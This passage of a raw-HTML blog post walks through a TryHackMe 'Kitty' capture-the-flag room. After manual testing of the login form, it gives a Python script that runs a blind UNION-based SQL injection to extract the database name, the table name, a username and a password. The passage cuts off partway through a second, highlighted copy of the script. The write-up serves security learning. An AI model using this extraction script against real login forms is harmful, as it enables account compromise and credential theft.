data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?fit=1024%2C314&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?resize=1024%2C314&#038;ssl=1\" alt=\"\" class=\"wp-image-440\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?resize=1024%2C314&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?resize=300%2C92&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?resize=768%2C235&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?resize=1536%2C471&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-16.png?w=1671&amp;ssl=1 1671w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-jetpack-markdown\"><blockquote>\n<p>I tried sqlmap as well but none of the parameters were injectable according to the tool<\/p>\n<\/blockquote>\n<\/div>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Foothold<\/mark><\/h3>\n\n\n\n<p>We may have to do this the old-school way. We can start by enumerating the number of columns.<\/p>\n\n\n\n<div style=\"height:14px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"531\" data-attachment-id=\"441\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-17-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-17.png?fit=1063%2C551&amp;ssl=1\" data-orig-size=\"1063,551\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-17\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-17.png?fit=1024%2C531&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-17.png?resize=1024%2C531&#038;ssl=1\" alt=\"\" class=\"wp-image-441\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-17.png?resize=1024%2C531&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-17.png?resize=300%2C156&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-17.png?resize=768%2C398&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-17.png?w=1063&amp;ssl=1 1063w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If our query is not true, we will get the error message for login.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-full\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"632\" data-attachment-id=\"442\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-18-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?fit=900%2C632&amp;ssl=1\" data-orig-size=\"900,632\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-18\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?fit=900%2C632&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=900%2C632&#038;ssl=1\" alt=\"\" class=\"wp-image-442\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?w=900&amp;ssl=1 900w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=300%2C211&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-18.png?resize=768%2C539&amp;ssl=1 768w\" sizes=\"auto, (max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>If our query is right, we are greeted with a welcome message.<\/p>\n\n\n\n<div style=\"height:9px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"518\" data-attachment-id=\"443\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-19-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-19.png?fit=1249%2C632&amp;ssl=1\" data-orig-size=\"1249,632\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-19\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-19.png?fit=1024%2C518&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-19.png?resize=1024%2C518&#038;ssl=1\" alt=\"\" class=\"wp-image-443\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-19.png?resize=1024%2C518&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-19.png?resize=300%2C152&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-19.png?resize=768%2C389&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-19.png?w=1249&amp;ssl=1 1249w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:12px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img data-recalc-dims=\"1\" loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"351\" data-attachment-id=\"444\" data-permalink=\"https:\/\/blog.ishsome.com\/index.php\/2024\/02\/05\/tryhackme-kitty\/image-20-2\/\" data-orig-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?fit=1745%2C598&amp;ssl=1\" data-orig-size=\"1745,598\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-20\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?fit=1024%2C351&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?resize=1024%2C351&#038;ssl=1\" alt=\"\" class=\"wp-image-444\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?resize=1024%2C351&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?resize=300%2C103&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?resize=768%2C263&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?resize=1536%2C526&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-20.png?w=1745&amp;ssl=1 1745w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Enumerating the entire database will take time if we continue this way. We can automate the process using a Python script below which I got from 0xb0b&#8217;s <a href=\"https:\/\/0xb0b.gitbook.io\/writeups\/tryhackme\/2024\/kitty\" target=\"_blank\" rel=\"noopener noreferrer nofollow\">Writeup<\/a>. The below script will give us the name of the database, name of the table, username, and password for the users in the table.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"import requests\n\nprobe = '+-{}(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_'\nurl = 'http:\/\/kitty.thm\/index.php'\nheaders = {\n\t'Host': 'kitty.thm',\n\t'User-Agent': 'Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0',\n\t'Accept': 'text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8',\n\t'Accept-Language': 'en-US,en;q=0.5',\n\t'Accept-Encoding': 'gzip, deflate, br',\n\t'Content-Type': 'application\/x-www-form-urlencoded',\n\t'Origin': 'http:\/\/kitty.thm',\n\t'Connection': 'close',\n\t'Referer': 'http:\/\/kitty.thm\/index.php',\n\t'Upgrade-Insecure-Requests': '1'\n}\ndb_name = ''\ntable_name = '' \nuser_name = '' \npassword = '' \n\nstate = 1\nwhile state &lt; 5:\n\tfor elem in probe:\n\t\tif state == 1:\n\t\t\tquery = &quot;' UNION SELECT 1,2,3,4 where database() like '{sub}%';-- -&quot;.format(sub=db_name+elem)\n\t\telif state == 2:\n\t\t\tquery = &quot;' UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = '{db}' and table_name like '{sub}%';-- -&quot;.format(sub=table_name+elem, db=db_name)\n\t\telif state == 3:\n\t\t\tquery = &quot;' UNION SELECT 1,2,3,4 from {tb} where username like '{sub}%' -- -&quot;.format(sub=user_name+elem,tb=table_name)\n\t\telif state == 4:\n\t\t\tquery = &quot;' UNION SELECT 1,2,3,4 from {tb} where username = '{user}' and password like BINARY '{sub}%' -- -&quot;.format(sub=password+elem,tb=table_name,user=user_name)\n\t\t\n\t\tdata = {\n\t\t    'username': query,\n\t\t    'password': '123456'\n\t\t}\n\t\tresponse = requests.post(url, headers=headers, data=data,allow_redirects=True)\n\t\t#print(&quot;Size of Response Content:&quot;, len(response.content), &quot;bytes&quot;)\n\t\tif(len(response.content) == 618):\n\t\t\tif state == 1:\n\t\t\t\tdb_name += elem\n\t\t\tif state == 2:\n\t\t\t\ttable_name += elem\t\n\t\t\tif state == 3:\n\t\t\t\tuser_name += elem\n\t\t\tif state == 4:\n\t\t\t\tpassword += elem\n\t\t\tbreak\n\t\tif(elem == probe[-1]):\n\t\t\tprint('\\033[K')\n\t\t\tif state == 1:\n\t\t\t\tprint(&quot;database:\\t&quot; + db_name)\n\t\t\telif state == 2:\n\t\t\t\tprint(&quot;table:\\t\\t&quot; + table_name)\n\t\t\telif state == 3:\n\t\t\t\tprint(&quot;user:\\t\\t&quot; + user_name)\n\t\t\telif state == 4:\n\t\t\t\tprint(&quot;password:\\t&quot; + password)\n\t\t\tstate = state +1\n\t\tif(elem != &quot;\\n&quot;):\t\t\n\t\t\tif state == 1:\n\t\t\t\tprint(&quot;database:\\t&quot; + db_name+elem,end='\\r')\n\t\t\telif state == 2:\n\t\t\t\tprint(&quot;table:\\t\\t&quot; + table_name+elem,end='\\r')\n\t\t\telif state == 3:\n\t\t\t\tprint(&quot;user:\\t\\t&quot; + user_name+elem,end='\\r')\n\t\t\telif state == 4:\n\t\t\t\tprint(&quot;password:\\t&quot; + password+elem,end='\\r')\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">import<\/span><span style=\"color: #BABED8\"> requests<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">probe <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">+-<\/span><span style=\"color: #F78C6C\">{}<\/span><span style=\"color: #C3E88D\">(), abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">url <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">http:\/\/kitty.thm\/index.php<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">headers <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Host<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">kitty.thm<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">User-Agent<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Mozilla\/5.0 (X11; Linux x86_64; rv:109.0) Gecko\/20100101 Firefox\/115.0<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Accept<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Accept-Language<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">en-US,en;q=0.5<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Accept-Encoding<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">gzip, deflate, br<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Content-Type<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">application\/x-www-form-urlencoded<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Origin<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">http:\/\/kitty.thm<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Connection<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">close<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Referer<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">http:\/\/kitty.thm\/index.php<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">Upgrade-Insecure-Requests<\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #89DDFF\">:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;<\/span><span style=\"color: #C3E88D\">1<\/span><span style=\"color: #89DDFF\">&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">db_name <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;&#39;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">table_name <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;&#39;<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">user_name <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;&#39;<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">password <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&#39;&#39;<\/span><span style=\"color: #BABED8\"> <\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">state <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF; font-style: italic\">while<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">5<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t<\/span><span style=\"color: #89DDFF; font-style: italic\">for<\/span><span style=\"color: #BABED8\"> elem <\/span><span style=\"color: #89DDFF; font-style: italic\">in<\/span><span style=\"color: #BABED8\"> probe<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">if<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">1<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\tquery <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">&#39; UNION SELECT 1,2,3,4 where database() like &#39;<\/span><span style=\"color: #F78C6C\">{sub}<\/span><span style=\"color: #C3E88D\">%&#39;;-- -<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">.<\/span><span style=\"color: #82AAFF\">format<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8; font-style: italic\">sub<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">db_name<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">2<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\tquery <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">&#39; UNION SELECT 1,2,3,4 FROM information_schema.tables WHERE table_schema = &#39;<\/span><span style=\"color: #F78C6C\">{db}<\/span><span style=\"color: #C3E88D\">&#39; and table_name like &#39;<\/span><span style=\"color: #F78C6C\">{sub}<\/span><span style=\"color: #C3E88D\">%&#39;;-- -<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">.<\/span><span style=\"color: #82AAFF\">format<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8; font-style: italic\">sub<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">table_name<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #82AAFF\"> <\/span><span style=\"color: #BABED8; font-style: italic\">db<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">db_name<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">3<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\tquery <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">&#39; UNION SELECT 1,2,3,4 from <\/span><span style=\"color: #F78C6C\">{tb}<\/span><span style=\"color: #C3E88D\"> where username like &#39;<\/span><span style=\"color: #F78C6C\">{sub}<\/span><span style=\"color: #C3E88D\">%&#39; -- -<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">.<\/span><span style=\"color: #82AAFF\">format<\/span><span style=\"color: #89DDFF\">(<\/span><span style=\"color: #BABED8; font-style: italic\">sub<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">user_name<\/span><span style=\"color: #89DDFF\">+<\/span><span style=\"color: #82AAFF\">elem<\/span><span style=\"color: #89DDFF\">,<\/span><span style=\"color: #BABED8; font-style: italic\">tb<\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #82AAFF\">table_name<\/span><span style=\"color: #89DDFF\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t<\/span><span style=\"color: #89DDFF; font-style: italic\">elif<\/span><span style=\"color: #BABED8\"> state <\/span><span style=\"color: #89DDFF\">==<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">4<\/span><span style=\"color: #89DDFF\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t\t\tquery <\/span><span style=\"color: #89DDFF\">=<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">&#39; UNION SELECT 1,2,3,4 from <\/span><span style=\"color: #F78C6C\">{tb}<\/span><span style=\"color: #C3E88D\"> where username = &#39;<\/span><span style=\"color: #F78C6C\">{user}<\/span><span 